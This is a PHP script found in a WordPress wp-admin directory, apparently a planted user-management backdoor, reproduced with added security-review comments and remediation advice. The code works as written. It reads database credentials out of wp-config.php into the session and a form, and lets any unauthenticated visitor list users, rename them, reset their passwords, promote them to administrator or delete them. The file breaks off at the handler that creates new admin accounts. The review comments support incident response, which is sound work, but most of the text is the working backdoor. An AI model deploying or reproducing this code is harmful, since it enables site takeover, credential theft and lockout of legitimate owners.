File: /home/saeaeroc/public_html/sae.aero/wp-admin/wpeeee.php — a non-core PHP script found inside a WordPress wp-admin directory; it performs no authentication and manipulates the users/usermeta tables directly.
<?php
// SECURITY REVIEW: this script is an unauthenticated WordPress user-management
// backdoor, not a WordPress core file (core ships no wp-admin/wpeeee.php).
// Nothing in the file checks a WordPress login, capability or nonce: any HTTP
// client that can reach it can list, create, re-password, promote or delete
// users. On the first request of a session it locates wp-config.php, extracts
// DB_HOST / DB_NAME / DB_USER / DB_PASSWORD / $table_prefix with regexes, stores
// them in the PHP session and pre-fills them (password included) into the
// connection form rendered at the bottom of the file.
// Remediation is removal, not hardening: delete the file, rotate the database
// password, purge the PHP session store (files by default; it now holds the DB
// credentials), audit {prefix}users / {prefix}usermeta for accounts and
// capability blobs written by this tool, and search the web server access log
// for requests to this path. A useful content marker is the page title
// "WordPress User Manager". The comments below describe behaviour only; no
// logic was changed.
session_start();
// Initial DB settings, read from the session. On a fresh session every field is
// empty here; the array is re-assigned further down after the wp-config.php
// autoload and the connection form have had a chance to populate the session.
// getDbConnection() reads the global at call time, so it sees the later value.
$db_config = [
'host' => $_SESSION['db_host'] ?? '',
'dbname' => $_SESSION['db_name'] ?? '',
'username' => $_SESSION['db_user'] ?? '',
'password' => $_SESSION['db_pass'] ?? '',
'prefix' => $_SESSION['db_prefix'] ?? 'wp_'
];
// Database connection
/**
 * Open a PDO connection using the global $db_config.
 *
 * Returns null, never throws: both "host or dbname not set yet" and "PDO
 * refused the credentials" collapse to null, so callers cannot tell the two
 * apart. Exceptions are enabled on the returned handle so the handlers below
 * can catch PDOException. The DSN forces utf8mb4; emulated prepares are left
 * at the driver default.
 *
 * @return PDO|null
 */
function getDbConnection() {
global $db_config;
if (empty($db_config['host']) || empty($db_config['dbname'])) {
return null;
}
try {
$dsn = "mysql:host={$db_config['host']};dbname={$db_config['dbname']};charset=utf8mb4";
$pdo = new PDO($dsn, $db_config['username'], $db_config['password']);
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
return $pdo;
} catch (PDOException $e) {
// Connection failure is swallowed; the driver message is never surfaced.
return null;
}
}
// PHPass class (the hash scheme WordPress accepts at login)
/**
 * Portable PHP password hashing framework (phpass), apparently copied from the
 * class WordPress bundles. It generates and verifies the iterated-MD5 "$P$" /
 * "$H$" format and, when the portable flag is off and CRYPT_BLOWFISH exists,
 * bcrypt hashes via crypt(). It is embedded here so the script can write
 * password hashes a WordPress login will accept without loading WordPress.
 */
class PasswordHash {
var $itoa64;               // 64-char alphabet used by the phpass base64 variant
var $iteration_count_log2; // base iteration exponent; gensalt_private() adds 5
var $portable_hashes;      // true => always emit $P$ hashes, never bcrypt
var $random_state;         // seed for the fallback PRNG in get_random_bytes()
/**
 * @param int  $iteration_count_log2 Base exponent for the MD5 iteration count.
 * @param bool $portable_hashes      Force the $P$ format instead of bcrypt.
 */
function __construct($iteration_count_log2 = 8, $portable_hashes = false) {
$this->itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
$this->iteration_count_log2 = $iteration_count_log2;
$this->portable_hashes = $portable_hashes;
// Seed for the fallback generator: wall-clock time plus the process id.
$this->random_state = microtime();
if (function_exists('getmypid'))
$this->random_state .= getmypid();
}
/**
 * Return $count random bytes.
 *
 * Prefers /dev/urandom. If that yields fewer bytes than requested it falls
 * back to chaining md5(microtime() . state), 16 bytes per step — a
 * time-seeded generator, not a cryptographic one. Salts produced from the
 * fallback are predictable to an attacker who can guess the request time.
 *
 * @param int $count
 * @return string Binary string of exactly $count bytes.
 */
function get_random_bytes($count) {
$output = '';
if (is_readable('/dev/urandom') &&
($fh = @fopen('/dev/urandom', 'rb'))) {
$output = fread($fh, $count);
fclose($fh);
}
if (strlen($output) < $count) {
$output = '';
for ($i = 0; $i < $count; $i += 16) {
$this->random_state =
md5(microtime() . $this->random_state);
$output .=
pack('H*', md5($this->random_state));
}
$output = substr($output, 0, $count);
}
return $output;
}
/**
 * phpass base64 variant: encode the first $count bytes of $input with the
 * itoa64 alphabet, 6 bits per output character, little-endian within each
 * 3-byte group, no padding. 6 bytes -> 8 chars; 16 bytes -> 22 chars.
 *
 * @param string $input Binary data.
 * @param int    $count Number of bytes of $input to encode.
 * @return string
 */
function encode64($input, $count) {
$output = '';
$i = 0;
do {
$value = ord($input[$i++]);
$output .= $this->itoa64[$value & 0x3f];
if ($i < $count)
$value |= ord($input[$i]) << 8;
$output .= $this->itoa64[($value >> 6) & 0x3f];
if ($i++ >= $count)
break;
if ($i < $count)
$value |= ord($input[$i]) << 16;
$output .= $this->itoa64[($value >> 12) & 0x3f];
if ($i++ >= $count)
break;
$output .= $this->itoa64[($value >> 18) & 0x3f];
} while ($i < $count);
return $output;
}
/**
 * Build a 12-character "$P$" setting string: the prefix, one alphabet
 * character encoding min(iteration_count_log2 + 5, 30) (with the default 8
 * this is index 13, the letter 'B'), and 8 salt characters encoded from the
 * first 6 bytes of $input.
 *
 * @param string $input At least 6 random bytes.
 * @return string
 */
function gensalt_private($input) {
$output = '$P$';
$output .= $this->itoa64[min($this->iteration_count_log2 +
((PHP_VERSION >= '5') ? 5 : 3), 30)];
$output .= $this->encode64($input, 6);
return $output;
}
/**
 * Compute a phpass portable hash of $password under $setting.
 *
 * $setting is either a fresh 12-char salt string or a full stored hash whose
 * first 12 chars play that role. Returns "*0" (or "*1" when the setting itself
 * starts with "*0") if the prefix is not $P$/$H$, the count character is
 * outside 2^7..2^30, or the salt is not 8 chars. Otherwise: one MD5 over
 * salt.password, then 2^count MD5 rounds over hash.password, and the 16-byte
 * result encoded to 22 chars and appended to the 12-char setting (34 chars).
 *
 * @param string $password
 * @param string $setting
 * @return string
 */
function crypt_private($password, $setting) {
$output = '*0';
if (substr($setting, 0, 2) == $output)
$output = '*1';
$id = substr($setting, 0, 3);
if ($id != '$P$' && $id != '$H$')
return $output;
$count_log2 = strpos($this->itoa64, $setting[3]);
if ($count_log2 < 7 || $count_log2 > 30)
return $output;
$count = 1 << $count_log2;
$salt = substr($setting, 4, 8);
if (strlen($salt) != 8)
return $output;
if (PHP_VERSION >= '5') {
$hash = md5($salt . $password, TRUE);
do {
$hash = md5($hash . $password, TRUE);
} while (--$count);
} else {
$hash = pack('H*', md5($salt . $password));
do {
$hash = pack('H*', md5($hash . $password));
} while (--$count);
}
$output = substr($setting, 0, 12);
$output .= $this->encode64($hash, 16);
return $output;
}
/**
 * Build a bcrypt setting string "$2a$NN$" + 22 salt characters, where NN is
 * iteration_count_log2 as two decimal digits and the salt is encoded from the
 * first 16 bytes of $input with the same alphabet as encode64 (big-endian
 * bit order here).
 *
 * @param string $input At least 16 random bytes.
 * @return string
 */
function gensalt_blowfish($input) {
$itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
$output = '$2a$';
$output .= chr(ord('0') + $this->iteration_count_log2 / 10);
$output .= chr(ord('0') + $this->iteration_count_log2 % 10);
$output .= '$';
$i = 0;
do {
$c1 = ord($input[$i++]);
$output .= $itoa64[$c1 >> 2];
$c1 = ($c1 & 0x03) << 4;
if ($i >= 16) {
$output .= $itoa64[$c1];
break;
}
$c2 = ord($input[$i++]);
$c1 |= $c2 >> 4;
$output .= $itoa64[$c1];
$c1 = ($c2 & 0x0f) << 2;
$c2 = ord($input[$i++]);
$c1 |= $c2 >> 6;
$output .= $itoa64[$c1];
$output .= $itoa64[$c2 & 0x3f];
} while (1);
return $output;
}
/**
 * Hash a password for storage.
 *
 * Rejects passwords over 4096 bytes with "*". Tries bcrypt through crypt()
 * first unless portable hashes were requested, accepting a 60-char result;
 * otherwise produces a $P$ hash from 6 random bytes and accepts a 34-char
 * result. Any other outcome returns "*", which no password can match.
 *
 * @param string $password
 * @return string
 */
function HashPassword($password) {
if (strlen($password) > 4096) {
return '*';
}
$random = '';
if (CRYPT_BLOWFISH == 1 && !$this->portable_hashes) {
$random = $this->get_random_bytes(16);
$hash =
crypt($password, $this->gensalt_blowfish($random));
if (strlen($hash) == 60)
return $hash;
}
if (strlen($random) < 6)
$random = $this->get_random_bytes(6);
$hash =
$this->crypt_private($password,
$this->gensalt_private($random));
if (strlen($hash) == 34)
return $hash;
return '*';
}
/**
 * Verify $password against $stored_hash.
 *
 * Uses crypt_private() for $P$/$H$ hashes and falls back to crypt() for any
 * other format (bcrypt etc.). The final comparison is a plain ===, not
 * hash_equals(), so it may leak timing on equal-length strings.
 *
 * @param string $password
 * @param string $stored_hash
 * @return bool
 */
function CheckPassword($password, $stored_hash) {
if (strlen($password) > 4096) {
return false;
}
$hash = $this->crypt_private($password, $stored_hash);
if ($hash[0] == '*')
$hash = crypt($password, $stored_hash);
return $hash === $stored_hash;
}
}
// WordPress-compatible password hash
/**
 * Hash a password the way a WordPress login will accept it.
 *
 * portable_hashes is forced to true, so HashPassword() skips the bcrypt branch
 * and always returns an iterated-MD5 "$P$B..." hash (or "*" on failure).
 *
 * @param string $password Clear-text password supplied by the request.
 * @return string
 */
function wp_hash_password($password) {
$hasher = new PasswordHash(8, true);
return $hasher->HashPassword($password);
}
// WordPress-compatible password check
/**
 * Verify a clear-text password against a stored WordPress hash.
 * Defined for completeness; nothing else in this file calls it.
 *
 * @param string $password
 * @param string $hash Stored user_pass value.
 * @return bool
 */
function wp_check_password($password, $hash) {
$hasher = new PasswordHash(8, true);
return $hasher->CheckPassword($password, $hash);
}
// Table prefix accessor
/**
 * Return the table prefix from the global $db_config ('wp_' unless the
 * session or wp-config.php supplied another value). The prefix is interpolated
 * directly into SQL table names throughout the file; it originates from the
 * connection form, i.e. from the client.
 *
 * @return string
 */
function getTablePrefix() {
global $db_config;
return $db_config['prefix'];
}
// Fetch a user's roles
/**
 * Return the keys of a user's serialized `{prefix}capabilities` usermeta row
 * (WordPress keeps role and capability names as keys with boolean values).
 * Returns [] when the row is absent.
 *
 * Caveats: the value goes straight into unserialize() with no is_array()
 * check, so a row that does not decode to an array makes array_keys() throw
 * a TypeError on PHP 8; and unserialize() on database content can instantiate
 * arbitrary classes if that row was tampered with.
 *
 * @param PDO $pdo
 * @param int $user_id
 * @return array<int, string>
 */
function getUserRoles($pdo, $user_id) {
$prefix = getTablePrefix();
$stmt = $pdo->prepare("SELECT meta_value FROM {$prefix}usermeta WHERE user_id = ? AND meta_key = ?");
$stmt->execute([$user_id, $prefix . 'capabilities']);
$result = $stmt->fetch(PDO::FETCH_ASSOC);
if ($result) {
$caps = unserialize($result['meta_value']);
return array_keys($caps);
}
return [];
}
// Administrator check
/**
 * True when the user's capabilities row contains the key 'administrator'.
 * Non-strict in_array(); the keys are strings so this is benign.
 *
 * @param PDO $pdo
 * @param int $user_id
 * @return bool
 */
function isUserAdmin($pdo, $user_id) {
$roles = getUserRoles($pdo, $user_id);
return in_array('administrator', $roles);
}
// Minimal login-name slugifier
/**
 * Build a nicename-style slug from a login name: lower-case it and keep only
 * ASCII letters, digits and hyphens. Underscores, dots, spaces and any
 * non-ASCII bytes are dropped. Used for user_nicename on insert; it is not an
 * input validator and the raw login is still stored unchanged.
 *
 * @param string $username Raw login name from the request.
 * @return string Lower-case string containing only [a-z0-9-].
 */
function sanitize_user($username) {
    $lowered = strtolower($username);
    return preg_replace('/[^a-z0-9-]/', '', $lowered);
}
// Locate wp-config.php
/**
 * Return the first readable wp-config.php among the script's own directory,
 * its parent and grandparent (the last two entries repeat the parent and
 * grandparent as relative paths). With the script sitting in wp-admin, the
 * parent-directory entry is where a standard install keeps the file, so this
 * normally succeeds without any input from the client.
 *
 * @return string|null Absolute (or __DIR__-relative) path, or null if none found.
 */
function findWpConfig() {
$current_dir = __DIR__;
$possible_locations = [
$current_dir . '/wp-config.php',
dirname($current_dir) . '/wp-config.php',
dirname(dirname($current_dir)) . '/wp-config.php',
$current_dir . '/../wp-config.php',
$current_dir . '/../../wp-config.php',
];
foreach ($possible_locations as $path) {
if (file_exists($path) && is_readable($path)) {
return $path;
}
}
return null;
}
// Extract database settings from wp-config.php
/**
 * Read wp-config.php as text and pull DB_NAME, DB_USER, DB_PASSWORD, DB_HOST
 * and $table_prefix out of it with regular expressions (the file is never
 * executed). This is the credential-harvesting step: the returned password is
 * later copied into the PHP session and rendered into an HTML form.
 *
 * Defaults (host 'localhost', prefix 'wp_', everything else empty) are kept
 * for any define() the regexes do not match — e.g. a value containing a quote
 * character, or a constant defined through a variable rather than a literal.
 * A missing file returns the defaults unchanged.
 *
 * @param string $config_path
 * @return array{host:string,dbname:string,username:string,password:string,prefix:string}
 */
function parseWpConfig($config_path) {
$config = [
'host' => 'localhost',
'dbname' => '',
'username' => '',
'password' => '',
'prefix' => 'wp_'
];
if (!file_exists($config_path)) {
return $config;
}
$content = file_get_contents($config_path);
// DB_NAME
if (preg_match("/define\s*\(\s*['\"]DB_NAME['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/i", $content, $matches)) {
$config['dbname'] = $matches[1];
}
// DB_USER
if (preg_match("/define\s*\(\s*['\"]DB_USER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/i", $content, $matches)) {
$config['username'] = $matches[1];
}
// DB_PASSWORD (the only pattern that also accepts an empty value)
if (preg_match("/define\s*\(\s*['\"]DB_PASSWORD['\"]\s*,\s*['\"]([^'\"]*)['\"]\s*\)/i", $content, $matches)) {
$config['password'] = $matches[1];
}
// DB_HOST
if (preg_match("/define\s*\(\s*['\"]DB_HOST['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/i", $content, $matches)) {
$config['host'] = $matches[1];
}
// $table_prefix assignment
if (preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]/i", $content, $matches)) {
$config['prefix'] = $matches[1];
}
return $config;
}
// Request routing
// The action comes straight from the query string. Nothing here or anywhere
// below checks a WordPress cookie, capability, nonce or password: every
// handler in this file is reachable by an anonymous client.
$action = $_GET['action'] ?? 'list';
$error = '';
$success = '';
// wp-config.php autoload (runs whenever the session holds no DB host/name,
// i.e. on the first request of every session, for any visitor). Copies the
// database credentials and table prefix into the PHP session store, which
// therefore contains the DB password in clear text from this point on.
if (empty($_SESSION['db_host']) && empty($_SESSION['db_name'])) {
$wp_config_path = findWpConfig();
if ($wp_config_path) {
$wp_config = parseWpConfig($wp_config_path);
if (!empty($wp_config['dbname'])) {
$_SESSION['db_host'] = $wp_config['host'];
$_SESSION['db_name'] = $wp_config['dbname'];
$_SESSION['db_user'] = $wp_config['username'];
$_SESSION['db_pass'] = $wp_config['password'];
$_SESSION['db_prefix'] = $wp_config['prefix'];
$_SESSION['wp_config_found'] = true;
}
}
}
// Connection settings, rebuilt now that the session may have been populated
// (the copy at the top of the file was computed before the autoload).
// These values, password included, are echoed into the connection form.
$db_config = [
'host' => $_SESSION['db_host'] ?? '',
'dbname' => $_SESSION['db_name'] ?? '',
'username' => $_SESSION['db_user'] ?? '',
'password' => $_SESSION['db_pass'] ?? '',
'prefix' => $_SESSION['db_prefix'] ?? 'wp_'
];
// Connection form submitted? Overwrite the session settings with whatever was
// POSTed (no CSRF token, no origin check), then test the connection. The
// POSTed prefix is later interpolated into table names as-is.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['connect'])) {
$_SESSION['db_host'] = $_POST['db_host'] ?? '';
$_SESSION['db_name'] = $_POST['db_name'] ?? '';
$_SESSION['db_user'] = $_POST['db_user'] ?? '';
$_SESSION['db_pass'] = $_POST['db_pass'] ?? '';
$_SESSION['db_prefix'] = $_POST['db_prefix'] ?? 'wp_';
// Refresh the global so getDbConnection() sees the new values
$db_config = [
'host' => $_SESSION['db_host'],
'dbname' => $_SESSION['db_name'],
'username' => $_SESSION['db_user'],
'password' => $_SESSION['db_pass'],
'prefix' => $_SESSION['db_prefix']
];
// Test the connection; 'db_connected' is only ever set on this path, so the
// autoloaded credentials still need one submit of the pre-filled form.
$pdo = getDbConnection();
if ($pdo) {
$_SESSION['db_connected'] = true;
$success = "Database bağlantısı başarılı!";
$action = 'list';
$is_connected = true;
} else {
$error = "Database bağlantısı başarısız! Lütfen bilgileri kontrol edin.";
unset($_SESSION['db_connected']);
$is_connected = false;
$pdo = null;
}
} else {
// Not a connect POST: reconnect from the session. Counts as connected only
// when a previous connect POST succeeded and the handle can be reopened.
$pdo = getDbConnection();
$is_connected = $pdo !== null && isset($_SESSION['db_connected']);
if (!$is_connected) {
$action = 'list';
}
}
// Disconnect: destroys the whole session (harvested credentials included) and
// redirects to the relative index.php, i.e. wp-admin/index.php. This runs
// after the reconnect above, so the DB is still contacted on the way out.
if (isset($_GET['disconnect'])) {
session_destroy();
header('Location: index.php');
exit;
}
// Single-user delete (POST delete_user). Any client in the "connected" state
// can delete any user ID, including the site's original administrators.
// Usermeta rows go first, then the users row; the two statements are not
// wrapped in a transaction, so a failure between them leaves a user without
// meta. The PDO error text is surfaced to the page on failure.
if ($is_connected && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['delete_user'])) {
$user_id = intval($_POST['user_id']);
$prefix = getTablePrefix();
try {
// Remove the user's meta rows
$stmt = $pdo->prepare("DELETE FROM {$prefix}usermeta WHERE user_id = ?");
$stmt->execute([$user_id]);
// Remove the user row itself
$stmt = $pdo->prepare("DELETE FROM {$prefix}users WHERE ID = ?");
$stmt->execute([$user_id]);
$success = "Kullanıcı başarıyla silindi.";
$action = 'list';
} catch (PDOException $e) {
$error = "Kullanıcı silinirken hata oluştu: " . $e->getMessage();
}
}
// Bulk edit, step 1 (POST bulk_edit): park the raw selected_users array in
// the session (no validation here; IDs are intval()'d when the bulk_update
// handler consumes them) and switch to the bulk_edit view.
if ($is_connected && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['bulk_edit']) && !empty($_POST['selected_users'])) {
$_SESSION['bulk_edit_users'] = $_POST['selected_users'];
$action = 'bulk_edit';
}
// Bulk delete (POST bulk_delete): same two DELETEs as the single-user path,
// once per selected ID; IDs <= 0 are skipped, errors are collected per user.
if ($is_connected && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['bulk_delete']) && !empty($_POST['selected_users'])) {
$selected_users = $_POST['selected_users'];
$prefix = getTablePrefix();
$deleted_count = 0;
$errors = [];
foreach ($selected_users as $user_id) {
$user_id = intval($user_id);
if ($user_id > 0) {
try {
// Remove the user's meta rows
$stmt = $pdo->prepare("DELETE FROM {$prefix}usermeta WHERE user_id = ?");
$stmt->execute([$user_id]);
// Remove the user row itself
$stmt = $pdo->prepare("DELETE FROM {$prefix}users WHERE ID = ?");
$stmt->execute([$user_id]);
$deleted_count++;
} catch (PDOException $e) {
$errors[] = "Kullanıcı ID {$user_id} silinirken hata: " . $e->getMessage();
}
}
}
if ($deleted_count > 0) {
$success = "{$deleted_count} kullanıcı başarıyla silindi.";
}
if (!empty($errors)) {
// Joined with "<br>" but later passed through htmlspecialchars(), so the
// tags render literally.
$error = implode("<br>", $errors);
}
$action = 'list';
}
// Bulk edit, step 2 (POST bulk_update): apply a role and optionally a new
// password to every ID saved by the bulk_edit step. This is the mass
// privilege-escalation / mass-lockout primitive of the tool.
if ($is_connected && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['bulk_update']) && !empty($_SESSION['bulk_edit_users'])) {
$selected_users = $_SESSION['bulk_edit_users'];
$user_role = $_POST['user_role'] ?? '';
$user_pass = $_POST['user_pass'] ?? '';
$prefix = getTablePrefix();
$updated_count = 0;
$errors = [];
// Everything below, including the password change, sits inside this role
// check: a submission with a password but an empty role updates nothing.
if (!empty($user_role)) {
// Role update
$capabilities = [];
switch ($user_role) {
case 'administrator':
// Explicit capability list written into usermeta rather than just the role
// name. NOTE(review): a capabilities blob carrying these individual keys
// (manage_network, delete_site, unfiltered_html, ...) is a practical marker
// for rows written by this script — verify against a clean install before
// relying on it during triage.
$capabilities = [
'administrator' => true,
'activate_plugins' => true,
'delete_others_pages' => true,
'delete_others_posts' => true,
'delete_pages' => true,
'delete_posts' => true,
'delete_private_pages' => true,
'delete_private_posts' => true,
'delete_published_pages' => true,
'delete_published_posts' => true,
'edit_others_pages' => true,
'edit_others_posts' => true,
'edit_pages' => true,
'edit_posts' => true,
'edit_private_pages' => true,
'edit_private_posts' => true,
'edit_published_pages' => true,
'edit_published_posts' => true,
'manage_categories' => true,
'manage_links' => true,
'manage_options' => true,
'moderate_comments' => true,
'publish_pages' => true,
'publish_posts' => true,
'read' => true,
'read_private_pages' => true,
'read_private_posts' => true,
'unfiltered_html' => true,
'upload_files' => true,
'edit_files' => true,
'edit_theme_options' => true,
'install_plugins' => true,
'install_themes' => true,
'list_users' => true,
'manage_network' => true,
'promote_users' => true,
'remove_users' => true,
'switch_themes' => true,
'update_core' => true,
'update_plugins' => true,
'update_themes' => true,
'edit_dashboard' => true,
'customize' => true,
'delete_site' => true,
'export' => true,
'import' => true,
'create_users' => true,
'delete_users' => true,
'edit_users' => true,
];
break;
case 'editor':
$capabilities = ['editor' => true];
break;
case 'author':
$capabilities = ['author' => true];
break;
case 'contributor':
$capabilities = ['contributor' => true];
break;
case 'subscriber':
$capabilities = ['subscriber' => true];
break;
}
// An unrecognised role falls through with an empty array -> "a:0:{}"
$capabilities_serialized = serialize($capabilities);
// Legacy user_level mirror of the role (admin 10, editor 7, author 2,
// contributor 1, anything else 0)
$user_level = 0;
if ($user_role === 'administrator') {
$user_level = 10;
} elseif ($user_role === 'editor') {
$user_level = 7;
} elseif ($user_role === 'author') {
$user_level = 2;
} elseif ($user_role === 'contributor') {
$user_level = 1;
}
foreach ($selected_users as $user_id) {
$user_id = intval($user_id);
if ($user_id > 0) {
try {
// Password reset: replaces user_pass with a fresh $P$ hash when supplied
if (!empty($user_pass)) {
$hashed_password = wp_hash_password($user_pass);
$stmt = $pdo->prepare("UPDATE {$prefix}users SET user_pass = ? WHERE ID = ?");
$stmt->execute([$hashed_password, $user_id]);
}
// Role update: UPDATE, then INSERT when no row was affected.
// NOTE(review): rowCount() is also 0 when the stored value already equals
// the new one (MySQL reports changed rows by default), so re-applying the
// same role can insert a duplicate usermeta row — verify on the target.
$stmt = $pdo->prepare("UPDATE {$prefix}usermeta SET meta_value = ? WHERE user_id = ? AND meta_key = ?");
$stmt->execute([$capabilities_serialized, $user_id, $prefix . 'capabilities']);
if ($stmt->rowCount() == 0) {
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'capabilities', $capabilities_serialized]);
}
// user_level update, same UPDATE-then-INSERT pattern and caveat
$stmt = $pdo->prepare("UPDATE {$prefix}usermeta SET meta_value = ? WHERE user_id = ? AND meta_key = ?");
$stmt->execute([$user_level, $user_id, $prefix . 'user_level']);
if ($stmt->rowCount() == 0) {
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'user_level', $user_level]);
}
$updated_count++;
} catch (PDOException $e) {
$errors[] = "Kullanıcı ID {$user_id} güncellenirken hata: " . $e->getMessage();
}
}
}
}
if ($updated_count > 0) {
$success = "{$updated_count} kullanıcı başarıyla güncellendi.";
}
if (!empty($errors)) {
$error = implode("<br>", $errors);
}
// The ID list is single-use
unset($_SESSION['bulk_edit_users']);
$action = 'list';
}
// Edit view: load one user (GET action=edit&id=N) with all of its usermeta.
// Exposes every users column (user_pass hash included) and every meta value
// to the page; no check that the requester may view this account.
$user = null;
$user_id = isset($_GET['id']) ? intval($_GET['id']) : 0;
if ($action === 'edit' && $is_connected && $user_id > 0) {
$prefix = getTablePrefix();
try {
$stmt = $pdo->prepare("SELECT * FROM {$prefix}users WHERE ID = ?");
$stmt->execute([$user_id]);
$user = $stmt->fetch(PDO::FETCH_ASSOC);
if (!$user) {
$error = "Kullanıcı bulunamadı!";
$action = 'list';
} else {
// meta_key => meta_value map; duplicate keys collapse to the last row
$stmt = $pdo->prepare("SELECT meta_key, meta_value FROM {$prefix}usermeta WHERE user_id = ?");
$stmt->execute([$user_id]);
$meta_data = $stmt->fetchAll(PDO::FETCH_KEY_PAIR);
$user['meta'] = $meta_data;
}
} catch (PDOException $e) {
$error = "Kullanıcı bilgileri yüklenirken hata oluştu: " . $e->getMessage();
$action = 'list';
}
}
// Single-user update (POST update_user): rename an account, change its
// e-mail / display name, optionally reset its password, and set its role.
// Combined with the unauthenticated access this lets any client take over an
// existing administrator by re-pointing its login and password. user_login,
// user_email and display_name are read without isset() and stored without any
// WordPress-style validation.
if ($is_connected && $_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['update_user'])) {
$user_id = intval($_POST['user_id']);
$user_login = trim($_POST['user_login']);
$user_email = trim($_POST['user_email']);
$display_name = trim($_POST['display_name']);
$user_pass = $_POST['user_pass'];
$user_role = $_POST['user_role'] ?? 'subscriber';
$prefix = getTablePrefix();
if (empty($user_login) || empty($user_email)) {
$error = "Kullanıcı adı ve e-posta zorunludur!";
$action = 'edit';
} else {
try {
// Core columns; user_pass only when a new password was supplied
if (!empty($user_pass)) {
$hashed_password = wp_hash_password($user_pass);
$stmt = $pdo->prepare("UPDATE {$prefix}users SET user_login = ?, user_email = ?, display_name = ?, user_pass = ? WHERE ID = ?");
$stmt->execute([$user_login, $user_email, $display_name, $hashed_password, $user_id]);
} else {
$stmt = $pdo->prepare("UPDATE {$prefix}users SET user_login = ?, user_email = ?, display_name = ? WHERE ID = ?");
$stmt->execute([$user_login, $user_email, $display_name, $user_id]);
}
// Role update; anything other than the four named roles becomes subscriber
$capabilities = [];
switch ($user_role) {
case 'administrator':
// Explicit capability list written into usermeta rather than just the role
// name. NOTE(review): a capabilities blob carrying these individual keys is
// a practical marker for rows written by this script — verify against a
// clean install before relying on it during triage.
$capabilities = [
'administrator' => true,
'activate_plugins' => true,
'delete_others_pages' => true,
'delete_others_posts' => true,
'delete_pages' => true,
'delete_posts' => true,
'delete_private_pages' => true,
'delete_private_posts' => true,
'delete_published_pages' => true,
'delete_published_posts' => true,
'edit_others_pages' => true,
'edit_others_posts' => true,
'edit_pages' => true,
'edit_posts' => true,
'edit_private_pages' => true,
'edit_private_posts' => true,
'edit_published_pages' => true,
'edit_published_posts' => true,
'manage_categories' => true,
'manage_links' => true,
'manage_options' => true,
'moderate_comments' => true,
'publish_pages' => true,
'publish_posts' => true,
'read' => true,
'read_private_pages' => true,
'read_private_posts' => true,
'unfiltered_html' => true,
'upload_files' => true,
'edit_files' => true,
'edit_theme_options' => true,
'install_plugins' => true,
'install_themes' => true,
'list_users' => true,
'manage_network' => true,
'promote_users' => true,
'remove_users' => true,
'switch_themes' => true,
'update_core' => true,
'update_plugins' => true,
'update_themes' => true,
'edit_dashboard' => true,
'customize' => true,
'delete_site' => true,
'export' => true,
'import' => true,
'create_users' => true,
'delete_users' => true,
'edit_users' => true,
];
break;
case 'editor':
$capabilities = ['editor' => true];
break;
case 'author':
$capabilities = ['author' => true];
break;
case 'contributor':
$capabilities = ['contributor' => true];
break;
default:
$capabilities = ['subscriber' => true];
}
$capabilities_serialized = serialize($capabilities);
// UPDATE then INSERT-if-unaffected. NOTE(review): rowCount() is also 0 when
// the value is unchanged (MySQL reports changed rows by default), so saving
// the same role twice can create a duplicate usermeta row — verify.
$stmt = $pdo->prepare("UPDATE {$prefix}usermeta SET meta_value = ? WHERE user_id = ? AND meta_key = ?");
$stmt->execute([$capabilities_serialized, $user_id, $prefix . 'capabilities']);
if ($stmt->rowCount() == 0) {
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'capabilities', $capabilities_serialized]);
}
// Legacy user_level mirror of the role (admin 10, editor 7, author 2,
// contributor 1, otherwise 0), same UPDATE-then-INSERT pattern
$user_level = 0;
if ($user_role === 'administrator') {
$user_level = 10;
} elseif ($user_role === 'editor') {
$user_level = 7;
} elseif ($user_role === 'author') {
$user_level = 2;
} elseif ($user_role === 'contributor') {
$user_level = 1;
}
$stmt = $pdo->prepare("UPDATE {$prefix}usermeta SET meta_value = ? WHERE user_id = ? AND meta_key = ?");
$stmt->execute([$user_level, $user_id, $prefix . 'user_level']);
if ($stmt->rowCount() == 0) {
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'user_level', $user_level]);
}
// For administrators, make sure user-settings / user-settings-time rows
// exist (created only if absent). NOTE(review): a user-settings-time value
// that coincides with a promotion is a useful triage timestamp — presumably
// WordPress itself writes this meta on screen-option changes; confirm.
if ($user_role === 'administrator') {
$stmt = $pdo->prepare("SELECT meta_id FROM {$prefix}usermeta WHERE user_id = ? AND meta_key = ?");
$stmt->execute([$user_id, $prefix . 'user-settings']);
if (!$stmt->fetch()) {
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'user-settings', '']);
}
$stmt = $pdo->prepare("SELECT meta_id FROM {$prefix}usermeta WHERE user_id = ? AND meta_key = ?");
$stmt->execute([$user_id, $prefix . 'user-settings-time']);
if (!$stmt->fetch()) {
$stmt = $pdo->prepare("INSERT INTO {$prefix}usermeta (user_id, meta_key, meta_value) VALUES (?, ?, ?)");
$stmt->execute([$user_id, $prefix . 'user-settings-time', time()]);
}
}
$success = "Kullanıcı başarıyla güncellendi!";
$action = 'list';
} catch (PDOException $e) {
$error = "Kullanıcı güncellenirken hata oluştu: " . $e->getMessage();
$action = 'edit';
}
}
}
// Create a new administrator (POST add_admin). This is the persistence
// primitive: an anonymous client gets a fresh WordPress admin account.
